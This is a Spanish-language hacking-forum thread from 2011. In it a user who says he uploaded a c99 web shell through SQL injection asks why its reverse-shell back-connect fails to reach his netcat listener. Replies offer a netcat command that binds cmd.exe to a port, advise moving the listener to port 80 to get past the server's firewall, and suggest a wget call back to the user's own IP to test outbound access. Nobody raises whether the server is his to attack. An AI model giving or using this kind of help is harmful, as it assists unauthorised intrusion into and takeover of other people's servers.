Sólo texto | Texto con Imágenes

Test Foro de elhacker.net SMF 2.1

Seguridad Informática => Bugs y Exploits => Hacking => Nivel Web => Mensaje iniciado por: pedrosh20 en 15 Noviembre 2011, 21:08 PM

Título: consulta sobre shell y netcat
Publicado por: pedrosh20 en 15 Noviembre 2011, 21:08 PM
bueno anduve practicando un poco de inyecciones sql y pude llegar a subir una shell c99.

he leido por ahi como rootear un server y lo he estado aplicando pero mi unico problema es que no me conecta la shell

en el back-connect de la shell c99 le coloco mi ip el puerto y en perl , luego dejo netcat a la escucha nc -l -v -p xxxx
y se queda escuchando nada mas(no hay conexion),  lo deje un buen rato.
(en los  papers se supone que deberia conectar.)

- no tengo ningun antivirus ni firewall
- probe tambien con backdoor en perl y nada

a que se puede deber este problema?
hay alguna otra forma de conectar a nc??
Título: Re: consulta sobre shell y netcat
Publicado por: MauroMasciar en 16 Noviembre 2011, 14:44 PM
Lo tenes mal creado.. El correcto es asi:

nc.exe -L -d -p 5544 -e cmd.exe

-L a diferencia de -l, acepta mas de una conexion, en cambio con -l (minuscula) una vez terminada la primera conexion, cierra.
-d no muestra la ventana
-p puerto XXXX
y -e ejecuta un programa al conectarse, en este caso lo que queres (En caso de que sea windows, o mete el que necesites) el cmd.exe

Eso querias??

Saludos ^^
Título: Re: consulta sobre shell y netcat
Publicado por: pedrosh20 en 16 Noviembre 2011, 20:39 PM
es una shell c99 y en su apartado sale esto


Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p <port>"!
>server linux
>configuro HOST como mi ip y el puerto en la shellc99

configuro el nc en mi equipo >nc -l -v -p xxxx
pero se queda ahi escuchando nada mas ese es mi problema

lo ideal seria que conectara y luego rootear el server
Título: Re: consulta sobre shell y netcat
Publicado por: WHK en 21 Noviembre 2011, 20:32 PM
está bien el comando, el netcat debe quedar a escucha "pero en tu pc" por lo tanto no necesitas dar como argumento el cmd.exe a menos que te quieras autotroyar xD o el servidor sea windows server.

Si no te conecta no te preocupes, no es tu firewall, debe ser el firewall del servidor y contra eso no puedes hacer nada, si esa conexión inversa no sirve es porque no sirve.

Intenta hacer lo mismo pero cambiale el puerto al 80, normalmente los firewalls dejan abierto el acceso a todos los puertos 80 remotos para utilizar wget, si  no te resulta prueba con dejarte a escucha al puerto 80 nuevamente pero ahora ejecutale un wget asi:
wget http://miip/
sy te sale la conexión en el netcat es porque de alguna forma el backdoor en perl no se está ejecutando y necesitas otra shell que si funcione.
Título: Re: consulta sobre shell y netcat
Publicado por: ipwn en 24 Noviembre 2011, 04:45 AM
es possible que lo servidor en causa tiene iptables ou outro tipo de firewall que no deja hacer outbound connections..
Sólo texto | Texto con Imágenes